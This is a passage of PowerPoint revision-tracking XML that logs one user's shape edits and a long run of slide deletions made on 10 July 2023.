          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:33:19.017" v="49" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:24:34.412" v="3138" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:24:34.412" v="3138" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="267"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:24:01.520" v="3134" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="267"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:24:08.020" v="3135" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="267"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:11.822" v="3418"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="271"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:03.869" v="1135"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2942073277" sldId="1079"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:06.706" v="2260"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2528303540" sldId="1080"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:31:42.436" v="37"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4146784984" sldId="1106"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:06.587" v="1136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="264912386" sldId="1107"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:09.166" v="1137"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3802706734" sldId="1108"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:10.463" v="1138"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="349688137" sldId="1109"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:12.478" v="1140"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3496256363" sldId="1110"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:11.119" v="1139"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3187245943" sldId="1111"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:08.987" v="2261"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3386279730" sldId="1112"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:09.972" v="2262"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1183481189" sldId="1113"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:10.597" v="2263"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2392548335" sldId="1114"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:13.269" v="2264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1527521176" sldId="1115"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:13.956" v="2265"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1175946327" sldId="1116"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:15.612" v="2266"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="916996346" sldId="1117"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:15.628" v="2267"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2616132116" sldId="1118"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:17.597" v="2268"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1533700083" sldId="1119"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:18.472" v="2269"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1382061131" sldId="1120"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:19.362" v="2270"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4118245124" sldId="1121"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:42.941" v="2274"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2529640088" sldId="1122"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:42.941" v="2273"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="968961268" sldId="1123"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:42.941" v="2272"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1668570343" sldId="1124"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:42.941" v="2271"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3496896032" sldId="1125"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:45.035" v="2278"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="256157239" sldId="1126"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:45.035" v="2277"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1129857140" sldId="1127"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:45.019" v="2276"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4239664472" sldId="1128"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:45.019" v="2275"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1551096136" sldId="1129"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:47.316" v="2282"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2264042113" sldId="1130"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:47.316" v="2281"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1554514343" sldId="1131"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:47.316" v="2280"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838524626" sldId="1132"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:47.316" v="2279"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="81080386" sldId="1133"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:50.707" v="2286"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3476304433" sldId="1134"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:50.707" v="2285"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="305817287" sldId="1135"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:50.707" v="2284"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1218587177" sldId="1136"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:50.691" v="2283"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4282627439" sldId="1137"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:56.692" v="2288"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3024563661" sldId="1138"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:06:56.692" v="2287"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2812953411" sldId="1139"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:02.801" v="2292"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1940174266" sldId="1140"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:02.786" v="2291"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1881152120" sldId="1141"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:02.786" v="2290"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2095041582" sldId="1142"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:02.786" v="2289"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="439968185" sldId="1143"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:05.270" v="2296"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="338875862" sldId="1144"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:05.270" v="2295"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2753968104" sldId="1145"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:05.270" v="2294"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3873838166" sldId="1146"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:05.254" v="2293"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1478653043" sldId="1147"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:07.848" v="2300"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4134821231" sldId="1148"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:07.848" v="2299"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3519264438" sldId="1149"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:07.833" v="2298"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="249830307" sldId="1150"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:07.833" v="2297"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3172124423" sldId="1151"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:11.755" v="2303"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1498414498" sldId="1152"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:11.755" v="2302"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2970188307" sldId="1153"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:07:11.755" v="2301"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="885818815" sldId="1154"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:13.322" v="3419"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3060107430" sldId="1155"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:13.822" v="3420"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1655188869" sldId="1156"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:14.776" v="3421"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4260375169" sldId="1157"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:19.291" v="3422"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3173861424" sldId="1158"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
